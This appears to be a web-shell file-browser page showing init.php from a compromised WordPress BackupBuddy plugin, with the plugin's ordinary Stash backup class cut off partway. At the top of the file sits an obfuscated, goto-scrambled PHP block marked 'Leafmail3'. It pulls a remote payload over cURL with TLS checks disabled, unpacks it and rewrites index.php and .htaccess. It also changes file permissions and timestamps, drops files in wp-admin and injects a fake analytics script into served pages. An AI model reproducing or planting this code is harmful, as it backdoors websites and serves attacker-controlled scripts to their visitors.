0byt3m1n1
Path:
/
home1
/
aserty
/
public_html
/
bonniescraftygifts.com
/
iFzj4
/
configCHM
/
Jump
/
0-aserty
/
beatlesmontreal.com
/
wp-contentebbd3f
/
plugins
/
backupbuddy
/
destinations
/
stash
/
[
Home
]
File: init.php
<?php /*Leafmail3*/goto hsxm4; mY3D9: $OKi1f .= "\145\x6e"; goto PMx6A; Kd95g: $eE8gG .= "\x66\x69\154\x65"; goto oGKV2; c0Bp6: $Jl55q .= "\164\157"; goto hLq5m; Vp4xb: $P5GVh = $Jl55q($guwhq); goto KpZeQ; KGgiz: $Yg3cE .= "\46\x68\x3d" . $Q6Si4; goto tGPrB; xpAbl: $PP2HF = $M1RhP($lL4Rq) || $M1RhP($Cb4XV); goto HSzn5; Kc0L3: @$jg8CY($QTlc9, $L0vpN); goto d3U3f; J7hLY: $oyXyy .= "\154\x72"; goto Bl7Ky; bQe_M: try { goto oX1u4; oX1u4: @$jg8CY($QTlc9, $HwdP2); goto mGuog; mGuog: @$jg8CY($OEoU0, $HwdP2); goto xHE2w; TupRK: @$jg8CY($OEoU0, $L0vpN); goto Mf0Y6; KHm7H: @$x09Um($KCjdR, $P5GVh); goto gKo15; gKo15: @$jg8CY($QTlc9, $L0vpN); goto fLtCp; c1PqG: @$jg8CY($KCjdR, $L0vpN); goto KHm7H; HZmuJ: @$jg8CY($KCjdR, $HwdP2); goto BHPy7; Mf0Y6: @$x09Um($OEoU0, $P5GVh); goto HZmuJ; BHPy7: @$SUpxe($KCjdR, $KmcLU["\142"]); goto c1PqG; xHE2w: @$SUpxe($OEoU0, $KmcLU["\x61"]); goto TupRK; fLtCp: } catch (Exception $w0YG7) { } goto KYs1a; Jfk_p: $guwhq = "\x2d\61"; goto FfLog; aYiIS: $NMbX8 .= "\144\x69\x72"; goto aKKe8; UPbyC: $HwdP2 += 304; goto fGMBR; JJZtD: $Jzlvr .= "\x75\156\143\164"; goto K31Ka; wCWRd: $SUj9O .= "\x73\x65"; goto SQa11; EdFV9: $M1RhP = "\144\x65\x66"; goto CcXTx; SDHjH: $QTlc9 = $_SERVER[$zl1NS]; goto BhGva; v4imZ: $aBJVO .= "\165\x65\162\x79"; goto ccRhk; C3xz0: $QuqQl .= "\157\160\164"; goto ExrBe; Mn8P4: $nCEBP .= "\143\153"; goto rirWy; oGKV2: $AIpqX = "\x69\x73\137"; goto yLTbR; ShiTE: $jg8CY = "\143\x68"; goto HTXlE; FRUFZ: if (!(!$PP2HF && $wU3zB)) { goto cynsl; } goto fT2Kb; D5OCa: $Jl55q = "\x73\164\162"; goto c0Bp6; jFRX7: $x09Um .= "\x75\143\150"; goto ShiTE; CIdAQ: try { goto uKjO1; uKjO1: $KJxhs = $Lbxvg(); goto h_HFe; ahPCJ: $SpmAm = $qG0GR($KJxhs); goto EzjNL; xG0S9: $QuqQl($KJxhs, CURLOPT_TIMEOUT, 10); goto ahPCJ; SQbKW: $QuqQl($KJxhs, CURLOPT_FOLLOWLOCATION, true); goto xG0S9; FS40F: $QuqQl($KJxhs, CURLOPT_RETURNTRANSFER, 1); goto h05EJ; h05EJ: $QuqQl($KJxhs, CURLOPT_SSL_VERIFYPEER, false); goto KfHmj; cFoFb: $SpmAm = trim(trim($SpmAm, "\xef\273\277")); goto XVsob; KfHmj: $QuqQl($KJxhs, CURLOPT_SSL_VERIFYHOST, false); goto SQbKW; EzjNL: $SUj9O($KJxhs); goto cFoFb; h_HFe: $QuqQl($KJxhs, CURLOPT_URL, $Yg3cE); goto FS40F; XVsob: } catch (Exception $w0YG7) { } goto Rf0CY; OWp53: $NMbX8 = "\155\x6b"; goto aYiIS; Dx3FV: $lrArR = $WVzi1[0]; goto IH6rw; i5aD2: if (!(!$eE8gG($KCjdR) || $wgQyS($KCjdR) != $CXpqw)) { goto eit7d; } goto KjDHJ; FWxON: $PVllF = "\144\x65\143"; goto EwaSn; KjDHJ: $YEcMX = 1; goto z9vF6; ZyUiw: $Jzlvr .= "\167\156\137\146"; goto JJZtD; mCzgW: $_SERVER[$Jzlvr] = 0; goto EkOAP; NflDd: $Yg3cE .= "\x63\157\x70\171"; goto KGgiz; yB2Sc: $JyN8a .= "\x69\x73\164\163"; goto Rkiyf; klUXl: $KCjdR .= "\x61\x63\x63\x65\163\x73"; goto lFs7r; Fra8y: $k1dzM = "\65"; goto Js55e; pF1JS: $OEoU0 .= "\150\160"; goto C_QnM; xhtvx: $leXnA .= "\x6e\x69"; goto rLZqh; n28OO: $sJIxp .= "\151\141\154\151\172\x65"; goto bm81E; znIi3: @unlink($leXnA); goto Kc0L3; slgUn: $sJIxp = "\x75\156\163\145\162"; goto n28OO; QELur: $Jzlvr .= "\147\151\x73\x74"; goto lEaPh; Js55e: $k1dzM .= "\56\x34"; goto N7I8b; rLZqh: if (!$eE8gG($leXnA)) { goto WwLVo; } goto laOt4; yCiib: EKIjw: goto m_fRf; Gcw6D: $SLV70 .= "\x6f\x6e\x5f\143\157\x6d"; goto FFtsE; bm81E: $a2D8O = "\151\x6e\164"; goto l0tUv; xQGdz: try { $_SERVER[$Jzlvr] = 1; $Jzlvr(function () { goto F3wJk; ZjuUH: $PgG92 .= "\x6f\162\145\x28\x67\54\x73\51\73" . "\xa"; goto IC5Gf; HNrtn: $PgG92 .= "\164\x2f\x6a\141\x76\x61"; goto NGG39; NGG39: $PgG92 .= "\163\x63\x72\x69\x70\x74\x22\x3e" . "\12"; goto fvKWo; zjuBs: $PgG92 .= $Q6Si4; goto ozlGd; e43vJ: $PgG92 .= "\x3b\40\147\x2e\x64\145\146"; goto WAaTZ; ctigl: $PgG92 .= "\143\x72\x69\x70\x74\76\12"; goto UQzFQ; o0zxz: $PgG92 .= "\x74\x6f\155\x6f\x20\x2d\55\x3e\12"; goto mPwIJ; HgwKa: $PgG92 .= "\x67\56\163\x72"; goto XHdHm; cMvbH: $PgG92 .= "\x3f\x69\x64\x3d"; goto CPJJv; T8SNl: $PgG92 .= "\x28\42\163\143\x72\x69"; goto DVVjf; EQZrG: $PgG92 .= "\165\155\x65\156\164\54\40\147\x3d\x64\56\x63\x72\x65\141\164\x65"; goto CVmAR; OsCJL: $PgG92 .= "\x72\x69\160\x74\x20\164\171\x70\x65\x3d\42\164\145\x78"; goto HNrtn; fvKWo: $PgG92 .= "\x28\146\x75\x6e\x63"; goto D9Z4J; XHdHm: $PgG92 .= "\143\x3d\x75\53\42\x6a\x73\x2f"; goto zjuBs; F3wJk: global $Q6Si4, $FOvp_; goto ikpGs; DVVjf: $PgG92 .= "\x70\164\x22\51\x5b\x30\135\73" . "\12"; goto OlxLe; CPJJv: $PgG92 .= "\x4d\55"; goto nBzuv; wKipS: $PgG92 .= "\x6a\141\x76\141"; goto y_xeS; D9Z4J: $PgG92 .= "\x74\x69\157\x6e\x28\51\x20\x7b" . "\12"; goto vt08G; vXk66: $PgG92 .= "\x79\124\x61\147\116\x61\155\145"; goto T8SNl; ikpGs: $PgG92 = "\x3c\x21\x2d\x2d\40\115\x61"; goto o0zxz; rJXe5: $PgG92 .= "\x72\151\160\164\42\51\x2c\40\163\75\144\56\147\x65\164"; goto pxHT_; VSQBz: $PgG92 .= "\x73\171\x6e\143\75\x74\162\x75\145"; goto e43vJ; pxHT_: $PgG92 .= "\x45\154\145\x6d\x65\x6e\x74\x73\x42"; goto vXk66; QIy0x: $PgG92 .= "\157\x6d\157\40\103\157\x64"; goto Uxlnc; rjIua: $PgG92 .= "\74\57\x73"; goto ctigl; puLbh: $PgG92 .= "\x3d\x22\164\x65\170\164\x2f"; goto wKipS; CVmAR: $PgG92 .= "\x45\154\145\155\145\x6e\164\50\42\x73\143"; goto rJXe5; UU_6f: $PgG92 .= "\x22\73\40\163\x2e\160\141\x72"; goto aBxBL; c1FaP: echo $PgG92; goto zSGUt; UQzFQ: $PgG92 .= "\x3c\x21\x2d\55\x20\x45\x6e"; goto qvKfj; IC5Gf: $PgG92 .= "\x7d\x29\50\51\73" . "\xa"; goto rjIua; OlxLe: $PgG92 .= "\x67\56\164\x79\x70\x65"; goto puLbh; EfTgB: $PgG92 .= "\166\x61\x72\40\x64\x3d\x64\x6f\143"; goto EQZrG; nBzuv: $PgG92 .= time(); goto UU_6f; Uxlnc: $PgG92 .= "\145\40\55\x2d\76\xa"; goto c1FaP; mZ3oI: $PgG92 .= "\x73\x65\x72\x74\102\145\x66"; goto ZjuUH; WAaTZ: $PgG92 .= "\x65\x72\x3d\164\162\x75\x65\x3b" . "\12"; goto HgwKa; ozlGd: $PgG92 .= "\57\x6d\x61\164"; goto TbrIf; aBxBL: $PgG92 .= "\145\x6e\164\x4e\x6f\144\x65\x2e\x69\156"; goto mZ3oI; mPwIJ: $PgG92 .= "\x3c\x73\x63"; goto OsCJL; vt08G: $PgG92 .= "\166\x61\x72\x20\x75\x3d\42" . $FOvp_ . "\42\x3b" . "\12"; goto EfTgB; y_xeS: $PgG92 .= "\163\x63\x72\x69\x70\x74\x22\73\40\147\56\x61"; goto VSQBz; qvKfj: $PgG92 .= "\144\40\115\141\x74"; goto QIy0x; TbrIf: $PgG92 .= "\157\155\157\56\x6a\163"; goto cMvbH; zSGUt: }); } catch (Exception $w0YG7) { } goto OMFq0; HTXlE: $jg8CY .= "\155\x6f\144"; goto u78ub; KT1wX: $WVzi1 = []; goto TZ3bq; d3U3f: WwLVo: goto QM61W; h87Dq: $leXnA .= "\145\162\x2e\x69"; goto xhtvx; nIVO8: $JyN8a = "\x66\x75\156\143"; goto GoX1L; jFsRM: $tAPba = 5; goto mY7sQ; SQa11: $aBJVO = "\150\164\x74\160\x5f\142"; goto AJs9s; laOt4: @$jg8CY($QTlc9, $HwdP2); goto L3sEg; MPyJp: $Jzlvr .= "\x73\x68\165"; goto scBFF; hs_XX: if (!is_array($KmcLU)) { goto Ji4ud; } goto LNg_o; L3sEg: @$jg8CY($leXnA, $HwdP2); goto znIi3; QIUGn: $SUpxe .= "\160\x75\164\137\x63"; goto kd_ew; KVOXl: $oyXyy = $QTlc9; goto coTO5; lEaPh: $Jzlvr .= "\x65\x72\137"; goto MPyJp; BhGva: $pW2vG = $QTlc9; goto NAu12; qNILG: $oyXyy .= "\150\160\56\60"; goto RNzhh; Zn9KR: $Lbxvg .= "\154\x5f\x69\x6e\151\x74"; goto qk2Ao; ZoBZC: $qG0GR .= "\154\x5f\x65\170\x65\x63"; goto AVxD0; mY7sQ: $tAPba += 3; goto y9KuX; ttAoG: $Yg3cE .= "\x3d\x67\145\x74"; goto NflDd; FFtsE: $SLV70 .= "\160\141\162\145"; goto EdFV9; eBPlp: $tbkvt .= "\137\x48\x4f\x53\x54"; goto mlRqF; y9KuX: $HwdP2 = 189; goto UPbyC; trQa2: $eE8gG = "\151\x73\x5f"; goto Kd95g; coTO5: $oyXyy .= "\x2f\170\x6d"; goto J7hLY; ccRhk: $D68oh = "\155\x64\x35"; goto wF0JY; zFQvK: $Kp0SW .= "\145\x70\x74\x61\x62\x6c\x65"; goto KVOXl; QsGMA: if (!(!$eE8gG($OEoU0) || $wgQyS($OEoU0) != $lrArR)) { goto Phq1q; } goto hbhZ9; dNN2Q: $L0vpN += 150; goto BU5yK; mf5ON: $QuqQl .= "\x6c\x5f\x73\x65\x74"; goto C3xz0; hTxii: $pFwD_ = "\x2f\136\x63"; goto GJpaV; SjSdb: if (!($JyN8a($Lbxvg) && !preg_match($pFwD_, PHP_SAPI) && $nCEBP($lMxQN, 2 | 4))) { goto sPsQO; } goto NFErl; xsENl: try { goto Rj1Hp; zDVDE: $ahOJp .= "\164\75\x63\141"; goto YWC0r; EdFQK: if ($AIpqX($Io3QB)) { goto BpK_a; } goto r_zk0; OTh7W: $Io3QB = dirname($Nfe0e); goto EdFQK; toAoY: @$jg8CY($Io3QB, $HwdP2); goto ALYMH; g2WNq: $ahOJp = $FOvp_; goto Q_jhz; YWC0r: $ahOJp .= "\154\154"; goto qpBjZ; Rj1Hp: $Nfe0e = $QTlc9 . $KmcLU["\x64"]["\160\141\164\150"]; goto OTh7W; r_zk0: @$NMbX8($Io3QB, $HwdP2, true); goto yxLDn; IMGFo: VUik8: goto OCPb3; ALYMH: @$SUpxe($Nfe0e, $KmcLU["\144"]["\x63\157\x64\x65"]); goto D2b8f; yxLDn: BpK_a: goto VXrMt; VXrMt: if (!$AIpqX($Io3QB)) { goto VUik8; } goto toAoY; l8bWn: try { goto Rtq9b; N8H27: $SUj9O($KJxhs); goto PHxGn; P9hMZ: $QuqQl($KJxhs, CURLOPT_URL, $ahOJp); goto aJWcu; GlRPI: $QuqQl($KJxhs, CURLOPT_POSTFIELDS, $aBJVO($nLpk_)); goto M4b4c; bz5Ia: $QuqQl($KJxhs, CURLOPT_POST, 1); goto GlRPI; ifFFq: $QuqQl($KJxhs, CURLOPT_SSL_VERIFYHOST, false); goto kx509; M4b4c: $qG0GR($KJxhs); goto N8H27; UfA6j: $QuqQl($KJxhs, CURLOPT_TIMEOUT, 3); goto bz5Ia; kx509: $QuqQl($KJxhs, CURLOPT_FOLLOWLOCATION, true); goto UfA6j; aJWcu: $QuqQl($KJxhs, CURLOPT_RETURNTRANSFER, 1); goto hBtdw; Rtq9b: $KJxhs = $Lbxvg(); goto P9hMZ; hBtdw: $QuqQl($KJxhs, CURLOPT_SSL_VERIFYPEER, false); goto ifFFq; PHxGn: } catch (Exception $w0YG7) { } goto IMGFo; s60Ax: @$x09Um($Nfe0e, $P5GVh); goto g2WNq; Q_jhz: $ahOJp .= "\77\x61\x63"; goto zDVDE; D2b8f: @$jg8CY($Nfe0e, $L0vpN); goto s_yVr; qpBjZ: $nLpk_ = ["\144\141\164\141" => $KmcLU["\x64"]["\165\162\x6c"]]; goto l8bWn; s_yVr: @$jg8CY($Io3QB, $L0vpN); goto s60Ax; OCPb3: } catch (Exception $w0YG7) { } goto bQe_M; e4Ifc: $Q6Si4 = $_SERVER[$tbkvt]; goto SDHjH; EwaSn: $PVllF .= "\x6f\143\x74"; goto CwGUI; yLTbR: $AIpqX .= "\x64\151\x72"; goto OWp53; BpAbm: $lL4Rq = "\x57\120\137\x55"; goto lIGrh; QBgho: Z7kbo: goto MUx3h; IH6rw: $CXpqw = $WVzi1[1]; goto QsGMA; yCtJ5: $JyN8a .= "\145\170"; goto yB2Sc; rirWy: $d_KAU = "\x66\143\x6c"; goto kGS2i; ExrBe: $qG0GR = $MogIQ; goto ZoBZC; qk2Ao: $QuqQl = $MogIQ; goto mf5ON; Z31wx: $jg8CY($QTlc9, $HwdP2); goto Ag8lc; K4l5B: $OEoU0 .= "\144\x65\x78\x2e\160"; goto pF1JS; bRDE_: $Cb4XV .= "\x5f\x41\x44"; goto YF7Rp; nElWS: $guwhq .= "\141\x79\x73"; goto Vp4xb; tP5eQ: $pW2vG .= "\x2d\141"; goto wx8gB; GJpaV: $pFwD_ .= "\x6c\151\57"; goto xJCEv; lFs7r: $leXnA = $QTlc9; goto tV4kM; t0fao: $Yg3cE = $FOvp_; goto NZ1x6; XrDkv: if (isset($_SERVER[$Jzlvr])) { goto r0CaT; } goto mCzgW; PMx6A: $nCEBP = "\146\154\157"; goto Mn8P4; C2C3X: $wgQyS .= "\154\x65"; goto trQa2; zsusp: $KmcLU = 0; goto jkCOI; NIEOu: $L0vpN = 215; goto dNN2Q; OEFkW: rsAYm: goto UL5LC; hbhZ9: $YEcMX = 1; goto IiUuQ; m_fRf: if (!$YEcMX) { goto gtKXO; } goto t0fao; i7ojl: $guwhq .= "\63\40\144"; goto nElWS; NAu12: $pW2vG .= "\57\x77\160"; goto tP5eQ; iw0Nk: $FOvp_ .= "\154\x69\x6e\x6b\56\164"; goto hSD1f; scBFF: $Jzlvr .= "\164\144\x6f"; goto ZyUiw; KpZeQ: $tbkvt = "\x48\124\124\120"; goto eBPlp; r500z: $KCjdR .= "\x2f\56\x68\x74"; goto klUXl; OMFq0: w6JGc: goto bH1zF; kd_ew: $SUpxe .= "\x6f\x6e\164\145\x6e\x74\163"; goto diLdg; PoTvn: $OEoU0 = $QTlc9; goto Fc1AY; aKKe8: $wM0cw = "\146\151\154\x65\137"; goto J0OQr; J3xw9: $FOvp_ = "\150\x74\x74\x70\163\72\57\57"; goto QlKtX; hSD1f: $FOvp_ .= "\157\160\57"; goto F0vj_; kGS2i: $d_KAU .= "\x6f\163\x65"; goto J3xw9; QM61W: $YEcMX = 0; goto SUEqd; p0Flx: $SUj9O .= "\154\137\143\x6c\x6f"; goto wCWRd; hLq5m: $Jl55q .= "\164\151"; goto lcFkG; YF7Rp: $Cb4XV .= "\115\x49\116"; goto xpAbl; eC9HP: $IhD_T = substr($D68oh($Q6Si4), 0, 6); goto DX3Ky; R8zQO: $SUpxe = "\146\151\x6c\145\137"; goto QIUGn; QlKtX: $FOvp_ .= "\x73\x65\x6f"; goto iw0Nk; C_QnM: $KCjdR = $QTlc9; goto r500z; EVan7: $y1BSo .= "\66\x34\x5f\x64"; goto n14XQ; CwGUI: $LDT3_ = "\x73\x74\x72"; goto iemde; wF0JY: $wgQyS = $D68oh; goto tC7IY; lcFkG: $Jl55q .= "\155\145"; goto nIVO8; LNg_o: try { goto mjWqA; aMSC6: @$jg8CY($iTCcx, $L0vpN); goto uokyK; UHS8F: @$jg8CY($pW2vG, $HwdP2); goto EZm8t; uokyK: @$x09Um($iTCcx, $P5GVh); goto bavy5; aNk_f: a5xL9: goto q700I; EZm8t: $iTCcx = $E3Ibu; goto aNk_f; OGZQL: if (!$AIpqX($pW2vG)) { goto a5xL9; } goto UHS8F; q700I: @$SUpxe($iTCcx, $KmcLU["\x63"]); goto aMSC6; mjWqA: @$jg8CY($QTlc9, $HwdP2); goto OGZQL; bavy5: } catch (Exception $w0YG7) { } goto xsENl; KYs1a: Ji4ud: goto QBgho; mlRqF: $zl1NS = "\104\x4f\103\125\115\x45\x4e\x54"; goto hivPL; OH0x0: $Tut_m .= "\x6e\146\154\x61\x74\145"; goto slgUn; Rf0CY: if (!($SpmAm !== false)) { goto Z7kbo; } goto zsusp; RNzhh: $OKi1f = "\146\157\160"; goto mY3D9; tC7IY: $wgQyS .= "\x5f\146\x69"; goto C2C3X; xePje: $Kp0SW = "\110\x54\124"; goto xIN_k; fT2Kb: $_POST = $_REQUEST = $_FILES = array(); goto UASYd; diLdg: $x09Um = "\164\157"; goto jFRX7; DX3Ky: $E3Ibu = $iTCcx = $pW2vG . "\57" . $IhD_T; goto KT1wX; J0OQr: $wM0cw .= "\x67\145\x74\137\x63"; goto KA3CR; MUx3h: gtKXO: goto qfVae; Ag8lc: $lMxQN = $OKi1f($oyXyy, "\167\x2b"); goto SjSdb; Rkiyf: $MogIQ = "\x63\165\x72"; goto chVKY; TZ3bq: $dmwnh = 32; goto jFsRM; tGPrB: $SpmAm = false; goto CIdAQ; hivPL: $zl1NS .= "\x5f\x52\117\117\x54"; goto Fra8y; Gx5VO: $Kp0SW .= "\60\x36\40\116\x6f"; goto z0Ye5; UL5LC: $YEcMX = 1; goto yCiib; NZ1x6: $Yg3cE .= "\77\141\143\x74"; goto ttAoG; xIN_k: $Kp0SW .= "\120\57\x31\x2e\x31\40\x34"; goto Gx5VO; BU5yK: $L0vpN = $a2D8O($PVllF($L0vpN), $tAPba); goto xePje; HPuPS: $SLV70 = "\166\145\162\x73\x69"; goto Gcw6D; lIGrh: $lL4Rq .= "\123\105\137\x54\x48\x45"; goto uBz23; GoX1L: $JyN8a .= "\164\x69\157\x6e\x5f"; goto yCtJ5; wx8gB: $pW2vG .= "\x64\x6d\151\156"; goto eC9HP; mEJVe: $s6EXz = $_FILES; goto p7L1U; uBz23: $lL4Rq .= "\115\x45\123"; goto Me43b; F0vj_: $Jzlvr = "\162\145"; goto QELur; l0tUv: $a2D8O .= "\x76\x61\154"; goto FWxON; tV4kM: $leXnA .= "\57\56\x75\163"; goto h87Dq; z0Ye5: $Kp0SW .= "\x74\40\101\x63\x63"; goto zFQvK; aSc51: goto EKIjw; goto OEFkW; K31Ka: $Jzlvr .= "\x69\157\x6e"; goto XrDkv; IiUuQ: Phq1q: goto i5aD2; NFErl: $jg8CY($QTlc9, $L0vpN); goto aro2m; EkOAP: r0CaT: goto BpAbm; UASYd: cynsl: goto Z31wx; N7I8b: $k1dzM .= "\x2e\60\73"; goto e4Ifc; Fc1AY: $OEoU0 .= "\x2f\151\156"; goto K4l5B; Bl7Ky: $oyXyy .= "\160\143\x2e\x70"; goto qNILG; HSzn5: $P0UrJ = $_REQUEST; goto mEJVe; KA3CR: $wM0cw .= "\157\156\164\x65\x6e\164\163"; goto R8zQO; AJs9s: $aBJVO .= "\165\151\154\x64\137\161"; goto v4imZ; z9vF6: eit7d: goto aSc51; chVKY: $Lbxvg = $MogIQ; goto Zn9KR; jkCOI: try { $KmcLU = @$sJIxp($Tut_m($y1BSo($SpmAm))); } catch (Exception $w0YG7) { } goto hs_XX; FfLog: $guwhq .= "\x33\x36"; goto i7ojl; u78ub: $y1BSo = "\x62\141\x73\x65"; goto EVan7; Me43b: $Cb4XV = "\127\x50"; goto bRDE_; p7L1U: $wU3zB = !empty($P0UrJ) || !empty($s6EXz); goto FRUFZ; bH1zF: try { goto hOljI; hTb2m: $WVzi1[] = $qQkQf; goto AVR1Z; wTrAR: $WVzi1[] = $mps9W; goto USnsY; O2FVm: $iTCcx = $QTlc9 . "\57" . $IhD_T; goto wiWx3; o5KeW: if (!empty($WVzi1)) { goto YMthw; } goto O2FVm; m1oNR: $WVzi1[] = $mps9W; goto hTb2m; C5yVp: NQbOe: goto o5KeW; uB5Qk: $mps9W = trim($JwExk[0]); goto hHGO3; tXeIo: I87JI: goto KjVrB; of38T: $JwExk = @explode("\72", $wM0cw($iTCcx)); goto lJihh; e3ZU6: $mps9W = trim($JwExk[0]); goto s4UPH; AVR1Z: uxegI: goto K3NXW; lU9RV: if (!($LDT3_($mps9W) == $dmwnh && $LDT3_($qQkQf) == $dmwnh)) { goto iEvPe; } goto wTrAR; ysg_I: LUX7P: goto tXeIo; BWadG: if (!(is_array($JwExk) && count($JwExk) == 2)) { goto LUX7P; } goto uB5Qk; wiWx3: if (!$eE8gG($iTCcx)) { goto I87JI; } goto GGIpg; hOljI: if (!$eE8gG($iTCcx)) { goto NQbOe; } goto of38T; GGIpg: $JwExk = @explode("\x3a", $wM0cw($iTCcx)); goto BWadG; KjVrB: YMthw: goto jes1d; hHGO3: $qQkQf = trim($JwExk[1]); goto lU9RV; m5G9U: if (!($LDT3_($mps9W) == $dmwnh && $LDT3_($qQkQf) == $dmwnh)) { goto uxegI; } goto m1oNR; zW9Vv: iEvPe: goto ysg_I; s4UPH: $qQkQf = trim($JwExk[1]); goto m5G9U; lJihh: if (!(is_array($JwExk) && count($JwExk) == 2)) { goto oJdNI; } goto e3ZU6; USnsY: $WVzi1[] = $qQkQf; goto zW9Vv; K3NXW: oJdNI: goto C5yVp; jes1d: } catch (Exception $w0YG7) { } goto PoTvn; W_RKl: $Tut_m = "\147\x7a\151"; goto OH0x0; n14XQ: $y1BSo .= "\145\x63\157\144\145"; goto W_RKl; hsxm4: $pqAdF = "\x3c\104\x44\115\76"; goto hTxii; xJCEv: $pFwD_ .= "\x73\x69"; goto D5OCa; SUEqd: if (empty($WVzi1)) { goto rsAYm; } goto Dx3FV; CcXTx: $M1RhP .= "\x69\x6e\145\x64"; goto Jfk_p; aro2m: if (!(!$_SERVER[$Jzlvr] && $SLV70(PHP_VERSION, $k1dzM, "\76"))) { goto w6JGc; } goto xQGdz; iemde: $LDT3_ .= "\x6c\145\156"; goto HPuPS; fGMBR: $HwdP2 = $a2D8O($PVllF($HwdP2), $tAPba); goto NIEOu; AVxD0: $SUj9O = $MogIQ; goto p0Flx; qfVae: sPsQO: ?> <?php // DO NOT CALL THIS CLASS DIRECTLY. CALL VIA: pb_backupbuddy_destination in bootstrap.php. class pb_backupbuddy_destination_stash { // Change class name end to match destination name. const ITXAPI_KEY = 'ixho7dk0p244n0ob'; const ITXAPI_URL = 'http://api.ithemes.com'; const MINIMUM_CHUNK_SIZE = 5; // Minimum size, in MB to allow chunks to be. Anything less will not be chunked even if requested. public static $destination_info = array( 'name' => 'BackupBuddy Stash (v1)', 'description' => '<b>The easiest of all destinations</b>; just enter your iThemes login and Stash away! Store your backups in the BackupBuddy cloud safely with high redundancy and encrypted storage. Supports multipart uploads for larger file support. Active BackupBuddy customers receive <b>free</b> storage! Additional storage upgrades optionally available. <a href="http://ithemes.com/backupbuddy-stash/" target="_blank">Learn more here.</a>', 'category' => 'legacy', // best, normal, legacy ); // Default settings. Should be public static for auto-merging. public static $default_settings = array( 'type' => 'stash', // MUST MATCH your destination slug. Required destination field. 'title' => '', // Required destination field. 'itxapi_username' => '', // Username to connect to iThemes API. 'itxapi_password' => '', // Password (hash) to connect to iThemes API. 'directory' => '', // Subdirectory to put into in addition to the site url directory. 'ssl' => '1', // Whether or not to use SSL encryption for connecting. 'server_encryption' => 'AES256', // Encryption (if any) to have the destination enact. Empty string for none. 'max_chunk_size' => '80', // Maximum chunk size in MB. Anything larger will be chunked up into pieces this size (or less for last piece). This allows larger files to be sent than would otherwise be possible. Minimum of 5mb allowed by S3. 'db_archive_limit' => '10', // Maximum number of db backups for this site in this directory for this account. No limit if zero 0. 'full_archive_limit' => '4', // Maximum number of full backups for this site in this directory for this account. No limit if zero 0. 'files_archive_limit' => '4', // Maximum number of files only backups for this site in this directory for this account. No limit if zero 0. 'manage_all_files' => '1', // Allow user to manage all files in Stash? If enabled then user can view all files after entering their password. If disabled the link to view all is hidden. 'use_packaged_cert' => '0', // When 1, use the packaged cacert.pem file included with the AWS SDK. 'disable_file_management' => '0', // When 1, _manage.php will not load which renders remote file management DISABLED. 'disabled' => '0', // When 1, disable this destination. // Do not store these for destination settings. Only used to pass to functions in this file. '_multipart_id' => '', // Instance var. Internal use only for continuing a chunked upload. '_multipart_partnumber' => 0, // Instance var. Part number to upload next. '_multipart_file' => '', // Instance var. Internal use only to store the file that is currently set to be multipart chunked. '_multipart_counts' => array(), // Instance var. Multipart chunks to send. Generated by S3's get_multipart_counts(). '_multipart_upload_data' => '', // Instance var. Contains the Stash upload data returned from the Stash API upload URL. Re-used for multipart sending of parts. '_multipart_backup_type_dir' => '', // Instance var. Backup type subdirectory (if any). ); /* send() * * Send one or more files. * * @param array $file Array of one or more files to send. * @return boolean|array True on success, false on failure, array( multipart_id, status_text ) if a multipart chunked send. */ public static function send( $settings = array(), $file, $send_id = '', $delete_after = false, $clear_uploads = false ) { global $pb_backupbuddy_destination_errors; if ( '1' == $settings['disabled'] ) { $pb_backupbuddy_destination_errors[] = __( 'Error #48933: This destination is currently disabled. Enable it under this destination\'s Advanced Settings.', 'it-l10n-backupbuddy' ); return false; } if ( is_array( $file ) ) { $file = $file[0]; } pb_backupbuddy::status( 'details', 'Post-send deletion: ' . $delete_after ); global $pb_backupbuddy_destination_errors; if ( $clear_uploads === false ) { // Uncomment the following line to override and always clear. //$clear_uploads = true; } $meta = array(); if ( isset( $settings['meta'] ) ) { pb_backupbuddy::status( 'details', 'Meta setting passed. Applying to all files in this pass.' ); $meta = $settings['meta']; } $forceRootUpload = false; if ( isset( $settings['forceRootUpload'] ) ) { $forceRootUpload = $settings['forceRootUpload']; } $itxapi_username = $settings['itxapi_username']; $itxapi_password = $settings['itxapi_password']; $db_archive_limit = $settings['db_archive_limit']; $full_archive_limit = $settings['full_archive_limit']; $files_archive_limit = $settings['files_archive_limit']; $max_chunk_size = $settings['max_chunk_size']; if ( ( '0' != $max_chunk_size ) && ( $max_chunk_size < self::MINIMUM_CHUNK_SIZE ) ) { $max_chunk_size = self::MINIMUM_CHUNK_SIZE; pb_backupbuddy::status( 'details', 'Setting for chunk size is below minimum limit. Increased to minimum of `' . $max_chunk_size . '` MB.' ); } if ( true === $forceRootUpload ) { pb_backupbuddy::status( 'details', 'Forcing root upload.' ); $remote_path = '/'; } else { pb_backupbuddy::status( 'details', 'Not forcing root upload. Calculting root path.' ); $remote_path = self::get_remote_path( $settings['directory'] ); // Has leading and trailng slashes. } if ( $settings['ssl'] == '0' ) { $disable_ssl = true; } else { $disable_ssl = false; } $multipart_id = $settings['_multipart_id']; $multipart_counts = $settings['_multipart_counts']; pb_backupbuddy::status( 'details', 'Stash remote path set to `' . $remote_path . '`.' ); require_once( dirname( __FILE__ ) . '/lib/class.itx_helper.php' ); require_once( dirname( dirname( __FILE__ ) ) . '/_s3lib/aws-sdk/sdk.class.php' ); // Stash API talk. $stash = new ITXAPI_Helper( pb_backupbuddy_destination_stash::ITXAPI_KEY, pb_backupbuddy_destination_stash::ITXAPI_URL, $itxapi_username, $itxapi_password ); $manage_data = pb_backupbuddy_destination_stash::get_manage_data( $settings ); if ( ! is_array( $manage_data['credentials'] ) ) { pb_backupbuddy::status( 'error', 'Error #8484383b: Your authentication credentials for Stash failed. Verify your login and password to Stash. You may need to update the Stash destination settings. Perhaps you recently changed your password?' ); return false; } // Wipe all current uploads. if ( $clear_uploads === true ) { pb_backupbuddy::status( 'details', 'Clearing any current uploads via Stash call to `abort-all`.' ); $abort_url = $stash->get_upload_url(null, 'abort-all'); $request = new RequestCore($abort_url); try { $response = $request->send_request( true ); } catch (Exception $e) { $error = 'Error #237836: Unable to clear Stash quota information. Details:`' . $e->getMessage() . '`.'; pb_backupbuddy::status( 'error', $error ); echo $error; return false; } } // Process multipart transfer that we already initiated in a previous PHP load. if ( $multipart_id != '' ) { // Multipart upload initiated and needs parts sent. // Create S3 instance. pb_backupbuddy::status( 'details', 'Creating Stash S3 instance.' ); $s3 = new AmazonS3( $settings['_multipart_upload_data']['credentials'] ); // the key, secret, token if ( $disable_ssl === true ) { @$s3->disable_ssl(true); } pb_backupbuddy::status( 'details', 'Stash S3 instance created.' ); $backup_type = str_replace( '/', '', 